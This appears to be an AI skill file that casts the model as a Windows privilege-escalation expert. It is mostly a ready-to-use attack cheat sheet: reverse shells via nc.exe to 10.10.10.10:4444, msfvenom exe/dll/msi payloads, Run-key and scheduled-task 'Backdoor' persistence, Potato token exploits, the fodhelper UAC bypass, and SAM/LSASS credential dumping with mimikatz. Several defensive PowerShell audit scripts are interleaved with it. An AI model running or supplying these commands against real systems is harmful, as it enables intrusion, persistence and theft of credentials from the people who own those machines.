2025-11-30 09:03:09 +08:00

name: escalating-windows-privileges
description: Escalate privileges on Windows systems using service misconfigurations, DLL hijacking, token manipulation, UAC bypasses, registry exploits, and credential dumping. Use when performing Windows post-exploitation or privilege escalation.

Windows Privilege Escalation Skill

You are a Windows security expert specializing in privilege escalation techniques. Use this skill when the user requests help with:

  • Escalating privileges on Windows systems
  • Exploiting Windows misconfigurations
  • Service exploitation and DLL hijacking
  • Token manipulation and impersonation
  • Registry exploitation
  • UAC bypass techniques
  • Scheduled task abuse
  • Windows credential dumping

Core Methodologies

1. Initial System Enumeration

System Information:

# Basic system info
systeminfo
hostname
whoami /all
ver
wmic os get Caption,CSDVersion,OSArchitecture,Version

# Users and groups
net user
net user <username>
net localgroup
net localgroup Administrators
whoami /priv
whoami /groups

PowerShell Enumeration:

# System info
Get-ComputerInfo
Get-HotFix  # Installed patches
Get-Service  # All services with their current state (not only running ones)

# Current user privileges
$env:username
[Security.Principal.WindowsIdentity]::GetCurrent()

Network Information:

ipconfig /all
route print
arp -a
netstat -ano
netsh firewall show state
netsh firewall show config

2. Service Exploitation

Enumerate Services:

# List services
sc query
sc query state= all
wmic service list brief
Get-Service

# Detailed service info
sc qc <service_name>
sc query <service_name>

# Service permissions
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv %USERNAME% *

Unquoted Service Paths:

# Find unquoted service paths
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

# PowerShell
Get-WmiObject Win32_Service | Where-Object {$_.PathName -notlike '*"*' -and $_.PathName -like '* *'} | Select Name,PathName,StartMode

# Exploit: Place malicious executable in path with spaces
# Example path: C:\Program Files\My Service\service.exe
# Create: C:\Program.exe  (will execute before actual service)

Weak Service Permissions:

# Check service permissions with accesschk
accesschk.exe -uwcqv "Everyone" *
accesschk.exe -uwcqv "Authenticated Users" *
accesschk.exe -uwcqv "Users" *

# Modify service binary path
sc config <service> binpath= "C:\Windows\Temp\nc.exe -nv 10.10.10.10 4444 -e cmd.exe"
sc stop <service>
sc start <service>

# Change service to run as SYSTEM
sc config <service> obj= "LocalSystem" password= ""
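Defender's counterpart to the accesschk checks above, as an added example that is not part of the original skill. It needs nothing beyond what ships with Windows: it reads each service's security descriptor with sc.exe sdshow, parses the SDDL with .NET, and reports every Allow ACE that grants SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER or a generic write/all right to an identity outside a trusted set, i.e. exactly the rights the sc config commands above depend on. The trusted-principal list is an assumption to adjust per environment; the script runs in an elevated Windows PowerShell 5.1 or later session.

```powershell
# Added audit script, not part of the original skill. Lists services whose DACL lets a
# non-trusted identity reconfigure the service (binPath=, obj=, start type) or rewrite
# its security descriptor. Run elevated; uses only sc.exe and .NET types in the box.
# Assumption: identities outside $TrustedPrincipals count as low-privileged.

$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
# SERVICE_CHANGE_CONFIG 0x2, WRITE_DAC 0x40000, WRITE_OWNER 0x80000, GENERIC_ALL, GENERIC_WRITE
$DangerousMask = 0x2 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Get-ServiceDacl {
    # Returns the ACEs of one service's DACL, parsed from the SDDL that sc.exe sdshow prints.
    param([Parameter(Mandatory)][string]$Name)
    $sddl = & sc.exe sdshow $Name | ForEach-Object { $_.Trim() } |
            Where-Object { $_ -like 'D:*' } | Select-Object -First 1
    if (-not $sddl) { return @() }
    (New-Object System.Security.AccessControl.RawSecurityDescriptor $sddl).DiscretionaryAcl
}

function Resolve-Sid([System.Security.Principal.SecurityIdentifier]$Sid) {
    # Translate to DOMAIN\Name where possible; fall back to the raw SID string.
    try { $Sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $Sid.Value }
}

function Find-WeakServiceAce {
    param([string[]]$ServiceName = (Get-Service | Select-Object -ExpandProperty Name))
    foreach ($name in $ServiceName) {
        foreach ($ace in (Get-ServiceDacl -Name $name)) {
            if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
            if (($ace.AccessMask -band $DangerousMask) -eq 0) { continue }
            $who = Resolve-Sid $ace.SecurityIdentifier
            if ($TrustedPrincipals -contains $who) { continue }
            [pscustomobject]@{
                Service    = $name
                Principal  = $who
                AccessMask = '0x{0:X}' -f $ace.AccessMask
                Fix        = "sc.exe sdshow $name, then sc.exe sdset $name <SDDL without this ACE>"
            }
        }
    }
}

Find-WeakServiceAce | Format-Table -AutoSize -Wrap
```

Any row in the output is a service that a low-privileged logon could repoint at a binary of its choosing, which is the condition the sc config commands above exploit; fix it by rewriting the DACL with sc.exe sdset (or the service's installer) and then confirm the binary path and start type have not already been changed.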

Service Binary Hijacking:

# If you can replace service binary
# Create malicious executable
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evil.exe

# Replace original binary (if writable)
move C:\Path\To\Service\original.exe original.exe.bak
copy evil.exe C:\Path\To\Service\original.exe

# Restart service
sc stop <service>
sc start <service>

3. DLL Hijacking

DLL Search Order:

1. Application directory
2. System32 directory
3. System directory
4. Windows directory
5. Current directory
6. PATH directories

Find DLL Hijacking Opportunities:

# Process Monitor (procmon) - filter for NAME NOT FOUND and path contains .dll
# Look for applications loading DLLs from writable directories

# PowerShell - find writable directories in PATH
$env:PATH -split ';' | ForEach-Object { if (Test-Path $_) { icacls $_ } }

Create Malicious DLL:

# Generate DLL with msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evil.dll

# Place in writable directory that application loads from
# Wait for service/application restart

4. Registry Exploitation

Autorun Keys:

# Check autorun registry keys
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

# PowerShell
Get-ItemProperty -Path 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

# Modify if writable
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v backdoor /t REG_SZ /d "C:\Windows\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

AlwaysInstallElevated:

# Check if both are set to 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# If both = 1, can install MSI as SYSTEM
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f msi > evil.msi
msiexec /quiet /qn /i C:\Temp\evil.msi

Saved Credentials:

# Check for saved credentials
cmdkey /list

# Use saved credentials
runas /savecred /user:admin cmd.exe
runas /savecred /user:DOMAIN\Administrator "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
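Added audit script for the registry weaknesses in this section, written from the defender's side and not part of the original skill. It checks whether a non-admin identity can write to the machine-wide Run/RunOnce keys (the precondition for the reg add line above) and whether AlwaysInstallElevated is 1 in both hives (the precondition for the msiexec line). The trusted-principal list is an assumption; the HKCU half of the AlwaysInstallElevated check only reflects the user running the script, so run it as the users you care about or check the policy centrally. Windows PowerShell 5.1 or later, elevated.

```powershell
# Added audit script, not part of the original skill. Reports (1) Run/RunOnce keys under
# HKLM that a non-trusted identity can write to and (2) whether AlwaysInstallElevated is
# set to 1 in both HKLM and HKCU. Run elevated in Windows PowerShell 5.1+.
# Assumption: identities outside $TrustedPrincipals count as low-privileged.

$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                       'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')
# Registry rights that allow adding or changing a value: KEY_SET_VALUE, KEY_CREATE_SUB_KEY,
# WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE.
$RegWriteMask = 0x2 -bor 0x4 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Find-WritableRunKey {
    $keys = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
            'HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run'
    foreach ($key in $keys) {
        if (-not (Test-Path -Path $key)) { continue }
        foreach ($ace in (Get-Acl -Path $key).Access) {
            $who = $ace.IdentityReference.Value
            if ($ace.AccessControlType -ne 'Allow' -or $TrustedPrincipals -contains $who) { continue }
            if ((([int]$ace.RegistryRights) -band $RegWriteMask) -eq 0) { continue }
            [pscustomobject]@{
                Check     = 'WritableRunKey'
                Target    = $key
                Principal = $who
                Detail    = $ace.RegistryRights
                Fix       = "Remove the write ACE for '$who' (Get-Acl / Set-Acl on $key) and review every value already under the key"
            }
        }
    }
}

function Test-AlwaysInstallElevated {
    $machine = (Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer' `
                -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    $user    = (Get-ItemProperty -Path 'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer' `
                -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    # Only the combination is exploitable: the MSI runs as SYSTEM when both values are 1.
    $exposed = ($machine -eq 1) -and ($user -eq 1)
    [pscustomobject]@{
        Check     = 'AlwaysInstallElevated'
        Target    = 'Policies\Microsoft\Windows\Installer (HKLM + HKCU)'
        Principal = if ($exposed) { 'Any user able to run msiexec' } else { '-' }
        Detail    = "HKLM=$machine HKCU=$user"
        Fix       = if ($exposed) { 'Disable "Always install with elevated privileges" under both Computer and User Configuration > Administrative Templates > Windows Components > Windows Installer' } else { 'ok' }
    }
}

@(Find-WritableRunKey) + @(Test-AlwaysInstallElevated) |
    Format-Table Check, Target, Principal, Detail, Fix -AutoSize -Wrap
```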

5. Token Manipulation

Token Impersonation:

# Check for SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
whoami /priv

# If enabled, use Potato exploits:
# - JuicyPotato (Windows 7-10, Server 2008-2016)
# - RoguePotato (Windows 10/Server 2019)
# - PrintSpoofer (Windows 10/Server 2016+)

JuicyPotato:

# Requires SeImpersonate or SeAssignPrimaryToken
JuicyPotato.exe -t * -p C:\Windows\System32\cmd.exe -l 1337 -a "/c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

# With specific CLSID
JuicyPotato.exe -t * -p cmd.exe -l 1337 -c {CLSID}

PrintSpoofer (Modern Windows):

# For Windows 10/Server 2016+
PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -c "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"

GodPotato (Latest):

# For Windows Server 2012+, Windows 8+
GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe"
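Every Potato variant above needs SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege, so the question for a defender is who holds those rights on a given host. The script below, an added example that is not part of the original skill, exports the local security policy with secedit.exe, parses the User Rights Assignment section, and flags holders outside the default set. The expected-holder baseline is an assumption taken from the default Windows assignment (Administrators, SERVICE, LOCAL SERVICE, NETWORK SERVICE for impersonation; the two service accounts for primary-token assignment); hosts with IIS legitimately add IIS_IUSRS, and service accounts for SQL Server or similar products may be there by design. Windows PowerShell 5.1 or later, elevated.

```powershell
# Added audit script, not part of the original skill. Reports which principals hold
# SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege on this host and whether each
# holder is part of the default assignment. Run elevated in Windows PowerShell 5.1+.
# Assumption: $ExpectedHolders is the stock Windows baseline; extend it for IIS
# (S-1-5-32-568, IIS_IUSRS) or product service accounts that genuinely need the right.

$ExpectedHolders = @{
    SeImpersonatePrivilege        = @('S-1-5-32-544', 'S-1-5-6', 'S-1-5-19', 'S-1-5-20')
    SeAssignPrimaryTokenPrivilege = @('S-1-5-19', 'S-1-5-20')
}

function Get-PrivilegeAssignment {
    # Parses the [Privilege Rights] section of a secedit export into privilege -> SID list.
    # secedit writes holders as *SID (or as account names it could not resolve).
    $cfg = Join-Path $env:TEMP ('secpol-{0}.inf' -f [guid]::NewGuid())
    & secedit.exe /export /cfg $cfg /areas USER_RIGHTS | Out-Null
    try {
        $map = @{}
        foreach ($line in (Get-Content -LiteralPath $cfg)) {
            if ($line -match '^(Se\w+)\s*=\s*(.*)$') {
                $map[$Matches[1]] = @($Matches[2] -split ',' |
                    ForEach-Object { $_.Trim().TrimStart('*') } | Where-Object { $_ })
            }
        }
        $map
    } finally {
        Remove-Item -LiteralPath $cfg -ErrorAction SilentlyContinue
    }
}

function Resolve-Principal([string]$SidOrName) {
    # Translate a SID to DOMAIN\Name; anything that is not a SID is returned unchanged.
    try {
        (New-Object System.Security.Principal.SecurityIdentifier $SidOrName).Translate(
            [System.Security.Principal.NTAccount]).Value
    } catch { $SidOrName }
}

function Find-ImpersonationHolders {
    $assigned = Get-PrivilegeAssignment
    foreach ($priv in $ExpectedHolders.Keys) {
        foreach ($sid in @($assigned[$priv])) {
            $expected = $ExpectedHolders[$priv] -contains $sid
            [pscustomobject]@{
                Privilege = $priv
                Holder    = Resolve-Principal $sid
                Sid       = $sid
                Expected  = $expected
                Fix       = if ($expected) { '' } else {
                    "Remove under secpol.msc > Local Policies > User Rights Assignment > $priv, or document why this account needs it" }
            }
        }
    }
}

Find-ImpersonationHolders | Sort-Object Privilege, Expected | Format-Table -AutoSize -Wrap
```

whoami /priv, as used above, only shows the rights of the current token; this export shows the assignment for every account, which is what you need to know which service accounts would become SYSTEM the moment one of them is compromised.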

6. UAC Bypass

Check UAC Level:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# ConsentPromptBehaviorAdmin = 0 (admins elevate without any prompt, i.e. UAC is effectively off for them)
# ConsentPromptBehaviorAdmin = 5 (prompt for consent for non-Windows binaries, the default)

UAC Bypass Techniques:

# fodhelper.exe bypass (Windows 10)
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "cmd /c C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"

# Cleanup
Remove-Item "HKCU:\Software\Classes\ms-settings" -Recurse -Force

# Disk Cleanup bypass (cleanmgr.exe)
# Event Viewer bypass (eventvwr.exe)
# Computer Management bypass (compmgmt.msc)
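The defender's view of this section, as an added example that is not part of the original skill. Get-UacState reads the policy values the reg query above lists and says what they mean for the auto-elevation bypasses; Find-UserClassHijack scans every loaded user hive for the per-user Software\Classes\...\Shell\Open\command keys the fodhelper technique plants, flagging the ms-settings key itself and any handler that carries a DelegateExecute value, since neither exists on a clean profile. Assumptions: HKCU\Software\Classes is physically stored in the HKEY_USERS\<SID>_Classes hive, and only hives of currently logged-on users are loaded, so offline profiles need their UsrClass.dat loaded with reg load first. Windows PowerShell 5.1 or later, elevated.

```powershell
# Added audit script, not part of the original skill. Reports the UAC policy state and
# scans loaded user hives for planted Shell\Open\command handlers. Run elevated in
# Windows PowerShell 5.1+. Assumption: only logged-on users' hives are under HKEY_USERS.

$UacPolicy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-UacState {
    $p = Get-ItemProperty -Path $UacPolicy
    $assessment = if ($p.EnableLUA -ne 1) { 'UAC disabled: every admin logon gets a full token' }
        elseif ($p.ConsentPromptBehaviorAdmin -eq 0) { 'Admins elevate silently: there is no prompt to bypass' }
        elseif ($p.ConsentPromptBehaviorAdmin -eq 2 -and $p.PromptOnSecureDesktop -eq 1) {
            'Always notify: auto-elevating binaries such as fodhelper.exe prompt too, so the bypass does not apply' }
        else { 'Default-style prompting: auto-elevating binaries run without a prompt for admin users' }
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
        PromptOnSecureDesktop      = $p.PromptOnSecureDesktop
        Assessment                 = $assessment
    }
}

function Find-UserClassHijack {
    $hives = Get-ChildItem 'Registry::HKEY_USERS' |
        Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+(_Classes)?$' }
    foreach ($hive in $hives) {
        # The _Classes hive is where HKCU\Software\Classes writes actually land.
        $classes = if ($hive.PSChildName -like '*_Classes') { "Registry::$($hive.Name)" }
                   else { "Registry::$($hive.Name)\Software\Classes" }
        if (-not (Test-Path -LiteralPath $classes)) { continue }
        foreach ($class in (Get-ChildItem -LiteralPath $classes -ErrorAction SilentlyContinue)) {
            $cmdKey = "Registry::$($class.Name)\Shell\Open\command"
            if (-not (Test-Path -LiteralPath $cmdKey)) { continue }
            $props = Get-ItemProperty -LiteralPath $cmdKey -ErrorAction SilentlyContinue
            $planted = ($class.PSChildName -eq 'ms-settings') -or ($null -ne $props.DelegateExecute)
            if (-not $planted) { continue }
            [pscustomobject]@{
                UserHive        = $hive.PSChildName
                Key             = "$($class.Name)\Shell\Open\command"
                Command         = $props.'(default)'
                DelegateExecute = $props.DelegateExecute
                Fix             = "Export as evidence, then: Remove-Item -LiteralPath '$cmdKey' -Recurse -Force"
            }
        }
    }
}

Get-UacState | Format-List
Find-UserClassHijack | Format-Table -AutoSize -Wrap
```

For continuous detection rather than a point-in-time scan, the same key path is what to watch for in registry-modification telemetry (Sysmon Event ID 12/13 or a SACL-backed 4657), because the bypass has to create it before launching the auto-elevating binary.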

7. Scheduled Tasks

Enumerate Tasks:

# List scheduled tasks
schtasks /query /fo LIST /v
schtasks /query /fo TABLE /v

# PowerShell
Get-ScheduledTask
Get-ScheduledTask | Where-Object {$_.TaskPath -notlike "\Microsoft*"}

Exploit Writable Task Scripts:

# If task runs script you can modify
echo C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe > C:\Path\To\Task\script.bat

# Check task permissions
icacls C:\Path\To\Task\script.bat

Create Malicious Task:

# Create task to run as SYSTEM
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc onstart /ru System

# Create task to run every minute
schtasks /create /tn "Backdoor" /tr "C:\Temp\nc.exe 10.10.10.10 4444 -e cmd.exe" /sc minute /mo 1 /ru System
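Sections 2, 3 and 7 all describe the same shape of weakness: a privileged context (service, DLL search, scheduled task) runs or loads something from a location a low-privileged user can write to. The script below is an added example, not part of the original skill, that audits all three in one pass: unquoted service paths and service binaries, directories on the machine PATH (plus the SafeDllSearchMode setting), and the actions of scheduled tasks that run as SYSTEM, a service account or with highest privileges. The trusted-principal list and the write-rights mask are assumptions; it also assumes the ScheduledTasks module (Windows 8 / Server 2012 and later). Windows PowerShell 5.1 or later, elevated.

```powershell
# Added audit script, not part of the original skill. Finds locations that a low-privileged
# identity can write to and that a privileged service, DLL search or scheduled task later
# executes. Run elevated in Windows PowerShell 5.1+.
# Assumptions: identities outside $TrustedPrincipals count as low-privileged; the
# ScheduledTasks module is available.
$TrustedPrincipals = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
                       'NT SERVICE\TrustedInstaller', 'CREATOR OWNER')
# Write-class rights: WriteData, AppendData, WriteEA, WriteAttributes, Delete, WriteDAC,
# WriteOwner, plus GENERIC_ALL and GENERIC_WRITE as they appear in unmapped ACEs.
$WriteMask = 0x500D0116

function Get-LowPrivWriters {
    # Non-trusted identities holding a write-class Allow ACE on $Path (empty if none).
    param([string]$Path)
    if (-not $Path -or -not (Test-Path -LiteralPath $Path)) { return @() }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return @() }
    @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $TrustedPrincipals -notcontains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights) -band $WriteMask) -ne 0
    } | ForEach-Object { $_.IdentityReference.Value } | Sort-Object -Unique)
}

function New-Finding($Area, $Subject, $Path, $Writers) {
    [pscustomobject]@{ Area = $Area; Subject = $Subject; Path = $Path; WritableBy = ($Writers -join ', ') }
}

function Find-ServiceWritablePaths {
    foreach ($svc in (Get-CimInstance Win32_Service | Where-Object { $_.PathName })) {
        $raw = $svc.PathName.Trim()
        if ($raw -match '^"([^"]+)"') {
            $exe = $Matches[1]
        } else {
            $exe = if ($raw -match '^(.*?\.exe)') { $Matches[1] } else { $raw }
            if ($exe -match ' ') {
                # Unquoted path with spaces: the loader may try every space-delimited prefix,
                # so each parent directory of those prefixes must be non-writable.
                $parts = $exe -split ' '
                $parents = for ($i = 1; $i -lt $parts.Count; $i++) {
                    Split-Path -Parent ($parts[0..($i - 1)] -join ' ')
                }
                foreach ($dir in ($parents | Sort-Object -Unique)) {
                    $w = Get-LowPrivWriters $dir
                    if ($w) { New-Finding 'Service/UnquotedPathDir' $svc.Name $dir $w }
                }
            }
        }
        foreach ($target in @($exe, (Split-Path -Parent $exe))) {
            $w = Get-LowPrivWriters $target
            if ($w) { New-Finding 'Service/BinaryOrDir' $svc.Name $target $w }
        }
    }
}

function Find-PathWritableDirs {
    $dirs = [Environment]::GetEnvironmentVariable('Path', 'Machine') -split ';' |
        Where-Object { $_.Trim() } | ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()) }
    foreach ($dir in $dirs) {
        $w = Get-LowPrivWriters $dir
        if ($w) { New-Finding 'PATH/WritableDir' 'Machine PATH' $dir $w; continue }
        if (-not (Test-Path -LiteralPath $dir)) {
            # A PATH entry that does not exist can be created by whoever can write its parent.
            $w = Get-LowPrivWriters (Split-Path -Parent $dir)
            if ($w) { New-Finding 'PATH/MissingDirCreatable' 'Machine PATH' $dir $w }
        }
    }
    $sm = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager' -ErrorAction SilentlyContinue
    if ($sm.SafeDllSearchMode -eq 0) {
        New-Finding 'PATH/SafeDllSearchMode' 'Session Manager' 'SafeDllSearchMode=0 (current directory searched before system directories)' @('n/a')
    }
}

function Find-TaskWritableActions {
    foreach ($task in (Get-ScheduledTask -ErrorAction SilentlyContinue)) {
        $runAs = [string]$task.Principal.UserId
        $privileged = ($runAs -match '^(SYSTEM|LOCAL SERVICE|NETWORK SERVICE|S-1-5-(18|19|20))$') -or
                      ($runAs -match 'Administrator') -or ($task.Principal.RunLevel -eq 'Highest')
        if (-not $privileged) { continue }
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }
            $targets = @([Environment]::ExpandEnvironmentVariables($action.Execute.Trim('"')))
            # Interpreter actions (cmd /c, powershell -File, wscript): the script named in the
            # arguments is what really runs, so check it as well.
            if ($action.Arguments -match '([A-Za-z]:\\[^"]*?\.(bat|cmd|ps1|vbs|js|exe))') {
                $targets += [Environment]::ExpandEnvironmentVariables($Matches[1])
            }
            foreach ($t in $targets) {
                $w = Get-LowPrivWriters $t
                if ($w) { New-Finding "Task/Action as $runAs" ($task.TaskPath + $task.TaskName) $t $w }
            }
        }
    }
}

@(Find-ServiceWritablePaths) + @(Find-PathWritableDirs) + @(Find-TaskWritableActions) |
    Format-Table Area, Subject, Path, WritableBy -AutoSize -Wrap
```

Remediation is the same for every row: quote the service path (sc.exe config <name> binPath= "\"C:\full path\svc.exe\" args"), or remove the write ACE with icacls /remove:g, and then verify the file or directory has not already been replaced. Rows whose path is a user-profile or Temp directory under a SYSTEM task are the ones the schtasks examples above target.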

8. Kernel Exploits

Identify Windows Version:

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic os get Caption,CSDVersion,OSArchitecture,Version

Check Installed Patches:

wmic qfe list
wmic qfe get Caption,Description,HotFixID,InstalledOn

Common Windows Exploits:

# MS16-032 - Secondary Logon Handle (Windows 7-10, Server 2008-2012)
# MS17-010 - EternalBlue (Windows 7-10, Server 2008-2016)
# CVE-2021-1675 - PrintNightmare (Windows 7-11, Server 2008-2022)
# CVE-2021-36934 - HiveNightmare/SeriousSAM (Windows 10)

# Search exploits
searchsploit windows kernel | grep -i "privilege escalation"

Windows Exploit Suggester:

# On Linux
python windows-exploit-suggester.py --database 2021-09-01-mssb.xls --systeminfo systeminfo.txt

9. Credential Access

SAM/SYSTEM Dumping:

# Save registry hives (requires admin)
reg save HKLM\SAM C:\Temp\sam.hive
reg save HKLM\SYSTEM C:\Temp\system.hive
reg save HKLM\SECURITY C:\Temp\security.hive

# Extract hashes (on Linux)
samdump2 system.hive sam.hive
secretsdump.py -sam sam.hive -system system.hive LOCAL

# Volume Shadow Copy (requires admin)
vssadmin list shadows
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Temp\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Temp\system

LSASS Dumping:

# Task Manager method (GUI)
# Find lsass.exe -> Create Dump File

# procdump (Sysinternals)
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll method
tasklist | findstr lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse dump with mimikatz (offline)
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
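The defensive counterpart to the LSASS and SAM dumping commands above, as an added example that is not part of the original skill. Get-LsassProtectionState reports whether LSA runs as a protected process (RunAsPPL) and whether Credential Guard is running; either defeats the user-mode dump methods listed (procdump, comsvcs.dll MiniDump) because the handle open fails or the secrets are no longer in lsass memory. Find-LsassAccessEvents then pulls Sysmon ProcessAccess events (Event ID 10) whose target is lsass.exe and whose granted access includes PROCESS_VM_READ, the right every memory dump needs. Assumptions: Sysmon is installed with ProcessAccess logging (otherwise the event half reports that and returns), and the allow-list of legitimate source images is a starting point to tune per environment. Windows PowerShell 5.1 or later, elevated.

```powershell
# Added example, not part of the original skill: LSASS hardening state plus a Sysmon-based
# hunt for processes that opened lsass.exe with memory-read access. Run elevated in
# Windows PowerShell 5.1+. Assumptions: Sysmon ProcessAccess logging is enabled, and
# $AllowedSources is an environment-specific allow-list, not a complete one.

$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$AllowedSources = '\\(csrss|wininit|services|lsass|svchost|MsMpEng|MsSense|wmiprvse)\.exe$'

function Get-LsassProtectionState {
    $lsa = Get-ItemProperty -Path $LsaKey -ErrorAction SilentlyContinue
    $dg  = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard `
               -ErrorAction SilentlyContinue
    $pplOn = $lsa.RunAsPPL -in 1, 2      # 1 = protected with UEFI lock, 2 = protected without lock
    [pscustomobject]@{
        RunAsPPL               = $lsa.RunAsPPL
        LsaCfgFlags            = $lsa.LsaCfgFlags       # 1 or 2 = Credential Guard configured
        CredentialGuardRunning = [bool]($dg.SecurityServicesRunning -contains 1)
        Fix = if ($pplOn) { '' } else { "Set-ItemProperty '$LsaKey' -Name RunAsPPL -Value 1 -Type DWord  # reboot required" }
    }
}

function Find-LsassAccessEvents {
    param([int]$Hours = 24)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 10; StartTime = (Get-Date).AddHours(-$Hours) }
    try { $events = Get-WinEvent -FilterHashtable $filter -ErrorAction Stop }
    catch { Write-Warning "No Sysmon Event ID 10 available: $($_.Exception.Message)"; return }
    foreach ($e in $events) {
        # Flatten the EventData <Data Name="..."> elements into a hashtable.
        $data = @{}
        foreach ($d in ([xml]$e.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        if ($data.TargetImage -notmatch '\\lsass\.exe$') { continue }
        $granted = [Convert]::ToInt32($data.GrantedAccess, 16)
        if (($granted -band 0x10) -eq 0) { continue }          # no PROCESS_VM_READ: cannot copy memory
        if ($data.SourceImage -match $AllowedSources) { continue }
        [pscustomobject]@{
            Time          = $e.TimeCreated
            SourceImage   = $data.SourceImage
            SourcePid     = $data.SourceProcessId
            GrantedAccess = $data.GrantedAccess
            FullAccess    = ($granted -eq 0x1FFFFF)            # PROCESS_ALL_ACCESS, typical of procdump -ma
        }
    }
}

Get-LsassProtectionState | Format-List
Find-LsassAccessEvents | Sort-Object Time | Format-Table -AutoSize
```

The comsvcs.dll MiniDump method runs inside rundll32.exe, and Task Manager's dump runs inside taskmgr.exe, so those two source images against lsass.exe are the first things to triage in the output; neither belongs on the allow-list.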

Search for Passwords:

# Files containing password strings
findstr /si password *.txt *.xml *.ini *.config
findstr /si password C:\*.txt C:\*.xml C:\*.ini

# Unattend files
dir /s *unattend.xml
type C:\Windows\Panther\Unattend.xml
type C:\Windows\Panther\Unattended.xml

# PowerShell history
type %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
type C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

# IIS web.config
type C:\inetpub\wwwroot\web.config
type C:\Windows\System32\inetsrv\config\applicationHost.config

# Saved credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s

10. Group Policy Preferences (GPP)

Search for GPP Files:

# Find GPP XML files containing passwords
findstr /S /I cpassword \\<DOMAIN>\sysvol\<DOMAIN>\policies\*.xml

# Decrypt cpassword
gpp-decrypt <cpassword_value>
# PowerShell
Get-GPPPassword
Get-CachedGPPPassword
